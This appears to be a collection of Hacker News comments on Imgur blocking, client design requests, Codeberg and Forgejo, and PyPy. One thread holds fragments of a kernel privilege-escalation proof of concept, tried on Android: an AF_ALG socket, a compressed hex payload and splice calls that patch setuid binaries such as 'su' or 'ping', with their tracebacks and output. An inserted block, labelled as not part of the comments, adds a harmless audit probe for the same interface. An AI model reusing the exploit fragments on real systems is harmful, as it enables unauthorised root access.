
  {"data":{"error":"Imgur is temporarily over capacity. Please try again later."},"success":false,"status":403}
There is some strange irony to this, I suppose.

In my experience, that error is a lie and is what you get if they've IP blocked you. (Easy to hit on a VPN, in particular)

I get "content not viewable in your region", from the UK. Not an ideal image sharing website nowadays.

Other countries are available. With a UK passport you can move to Ireland, Thailand, or Australia fairly easily, amongst others.

Are you seriously suggesting that that's a feasible, go-to solution for a problem in your country? For most normal, well-adjusted people?

Rather, not an ideal legislation nowadays…

A protection against bad networks, including VPN.

It's been like that for over two years now.


It’s unfortunately not something Russians can fix either.

And I understand the desire to just blackhole all RU traffic, but if everybody starts doing this, it would result in two things:

1. Ordinary Russians who want to just read your website will have to jump through hoops (or probably find another source; I don’t live in Russia anymore but find myself clinging to the latter option for websites that decide to block all non-US traffic)

2. Hackers will... use botnets to proxy their traffic? It’s not like they don’t have options, they just pick lowest hanging fruits for now.

---

The proper solution to the hackers problem is:

• Use static sites for static content

• Practice good security for webapps, and maybe use a WAF


> When the founders say they want the picture bigger and the logo a bit more purple and can we add underlines to all the menu items and also bold them

Simple: they’re trying to give you the solution, and it’s your duty as the responsible designer/developer to find out what problem they see. Here’s a nice set of questions I’m using (from Managing projects, people, and yourself [1] by Nick Toverovskiy):

1. What did you mean by that?

2. Why is it important?

3. How is this related to the purpose of the project?

4. How does this relate to other parts of the system? What else could be affected by this change?

5. Why is it critical to resolve this before the next release / deadline?

This should paint a fairly decent picture of what’s really on your client’s (or manager’s) mind. Then you can propose a solution to the real problem – which might very well be the one that your client has proposed!

(Some questions might sound stupid in context. You can skip them, or just admit it: “I’m gonna ask some questions which might make me sound like an idiot, but that would really help me figure out the problem better. Would that be alright with you?”)

[1]: https://bureau.ru/books/fff-demo/20 (in Russian)


My problem with most of these books is they are indirectly trying to solve the real problem. The problem that IME HN is allergic to discussing.

Power Dynamics.

The reason the CEO is nitpicking your job is because he is not a good CEO and doesn't know his place or how to do his job. Almost all these books are about an indirect way of dealing with the fact that this person is an ID10T and you have to deal with them because they have more power than you. Yet it is literally NEVER discussed.

The books (IDK about this one) really summarize indirect ways of how to be subservient and not accidentally antagonize your "superiors" which are frequently people just born into a better lot in life than you, without feeling like that is what you are doing.

What are the CEO's primary duties? Networking, sales, COMMUNICATING, yet it's your job to read books on how to tiptoe around how to suss out what they cannot COMMUNICATE?


I'm a pretty opinionated engineer but I'll still volunteer that in a majority of "engineering" disputes, I care more about having a coordinated and consistent approach than I do about the absolute tack taken.

Maybe I've just been lucky to mostly work with decent managers, but basically I consider the tie-breaking function to be intrinsically valuable.


With this particular book, the prerequisite is that your client is trying to achieve something, yeah. I think I know the type of CEOs and CTOs that you’re talking about, the ones that only want to sound smart and don’t really care about the end result. Unfortunately, there’s not much you can do in this case apart from looking for a workplace where people do care about what they do.

We do it like that with everything. If you consider yourself an artist it is quite simple to say you can't put your name on it if anything changes. You can also explain what you just wrote: You've hired me, trust me to do it and focus on your tasks. Or: we will be different from others but in a limited number of ways and your suggestions don't offer enough ROI to make the cut.

> it’s your duty as the responsible designer/developer to find out what problem they see.

I tried with wildly varying degrees of success to impress this on my fellow developers for decades. In every case it was an utterly new and foreign idea to them, including those who had actually studied computer science at degree level.


I’ve poked around on my phone and it didn’t work:

    File "/data/data/com.termux/files/home/a.py", line 5, in c
      a=s.socket(38,5,0); # ...
    File "/data/data/com.termux/files/usr/lib/python3.13/socket.py", line 233, in __init__
      _socket.socket.__init__(self, family, type, proto, fileno)
      ~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  PermissionError: [Errno 13] Permission denied

I got line 5 to run and failed on line 8 due to lack of su. I'd need to find a user accessible setuid binary for it to work.

Traceback (most recent call last): File "/data/data/com.termux/files/home/exploit.py", line 8, in <module> f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) ^^^^^^^^^^^^^^^^^^^^^^^ FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'


Try /system/bin/ping

Now the socket is blocked. Also probably should have realized the socket is defined earlier than it's called.

Traceback (most recent call last): File "/data/data/com.termux/files/home/exploit.py", line 9, in <module> while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/data/data/com.termux/files/home/exploit.py", line 5, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) ^^^^^^^^^^^^^^^^ File "/data/data/com.termux/files/usr/lib/python3.12/socket.py", line 233, in __init__ _socket.socket.__init__(self, family, type, proto, fileno) PermissionError: [Errno 13] Permission denied


PoC is also x86_64 only and not arm.


Thanks! Will give it a try a bit later.

(HN algorithms have killed some of your comments, perhaps because you posted the same URL too many times from a relatively new account? I’ve vouched for you, but keep in mind that it triggers antispam.)

---

Edit: naturally, no luck:

  $ ./exploit /system/bin/ping
  [+] target:    /system/bin/ping
  [+] payload:   2112 bytes (528 iterations)
  socket(AF_ALG): Permission denied
  patch_chunk failed at offset 0

Guess AF_ALG is just disabled on Android kernel builds. Though maybe it’ll work on other devices!
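
Added example, not part of any comment here and not the PoC's code: a harmless audit probe that shows how to interpret the `Permission denied` returned by `socket(AF_ALG)` in the tracebacks above, and whether an unprivileged process can reach the kernel crypto API at all. The verdict names and the errno groupings are this example's own assumptions.

```python
import errno
import hashlib
import socket

# AF_ALG is address family 38 on Linux; fall back to the number if this
# Python build does not export the constant.
AF_ALG = getattr(socket, "AF_ALG", 38)

POLICY = (errno.EACCES, errno.EPERM)
UNSUPPORTED = (errno.EAFNOSUPPORT, errno.EPROTONOSUPPORT, errno.ESOCKTNOSUPPORT)


def classify(err):
    """Turn the errno of a failed AF_ALG call into an audit verdict."""
    if err is None:
        return "exposed"
    if err in POLICY:
        return "blocked-by-policy"   # e.g. an LSM rule or seccomp filter
    if err in UNSUPPORTED:
        return "not-supported"       # family absent from this kernel/OS
    return "unknown"


def probe_af_alg():
    """Return (verdict, errno, detail) for the current process."""
    try:
        alg = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    except OSError as exc:
        return classify(exc.errno), exc.errno, "socket() refused"
    try:
        # Benign functional check: hash a constant and compare with hashlib.
        alg.bind(("hash", "sha256"))
        op, _ = alg.accept()
        with op:
            op.sendall(b"audit")
            ok = op.recv(32) == hashlib.sha256(b"audit").digest()
        return "exposed", None, "sha256 ok" if ok else "sha256 mismatch"
    except OSError as exc:
        return "exposed", exc.errno, "socket() allowed, hash op failed"
    finally:
        alg.close()


if __name__ == "__main__":
    print(probe_af_alg())
    # Errno 13 is the value shown in the tracebacks quoted above.
    print(classify(13))
```

A `blocked-by-policy` verdict means the family exists but the calling context is denied it, which is a different finding from `not-supported`.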

This is something federation could help with: you would be able to use your account on, say, Codeberg to make issues on all self-hosted instances. Sadly, it’s still not in a great shape: https://forgefed.org/

(As a fallback, why not email the maintainers instead?)


And yet, GitHub Actions are notoriously broken, and serious customers are self-hosting their runners.

Codeberg does have some free CI runners, although I’m not sure what capacity they currently have, and how well it would work out if everybody decides to switch from GitHub today. They do encourage you to pick the smallest runner that works for you, and keep the workflows lean: https://codeberg.org/actions/meta

Or you can self-host your own runners too, of course.

Edit: there’s one caveat – Forgejo Actions are Linux only. If you need Windows or macOS runners, this won’t work for you. But... you could have a readonly GitHub mirror (which you should probably do if you want people to discover your project), and use the GitHub Actions runners for free :-)


> in theory yes, in practice no

Why? I don’t see any practical reason.


> But if projects move to something more akin to self-hosted forges, to their own self-hosted Mercurial or cgit servers, we run the risk of losing things that we don’t want to lose. The code might be distributed in theory, but the social context often is not. Issues, reviews, design discussions, release notes, security advisories, and old tarballs are fragile.

Thankfully, this doesn’t have to be the case – Forgejo imports pretty much everything mentioned. (1) Whether you decide to move to Codeberg or host your own instance, you won’t have to lose the context.

But I definitely agree we should also have a metadata archive of some sort, for both GitHub, Codeberg, and self-hosted projects.

(1): Not sure about code reviews, and you don’t get the security advisories, though I’m sure it can be replicated with a CI workflow somehow?


I’ve started buying cheap self-adhesive hooks on AliExpress and placing them myself. Not sure if they last long but hopefully owners get the message.


https://pypy.org/

It lags behind CPython in features and currently only supports Python versions up to 3.11. There was a big discussion a month ago: https://news.ycombinator.com/item?id=47293415

But you can help! https://pypy.org/howtohelp.html

https://opencollective.com/pypy

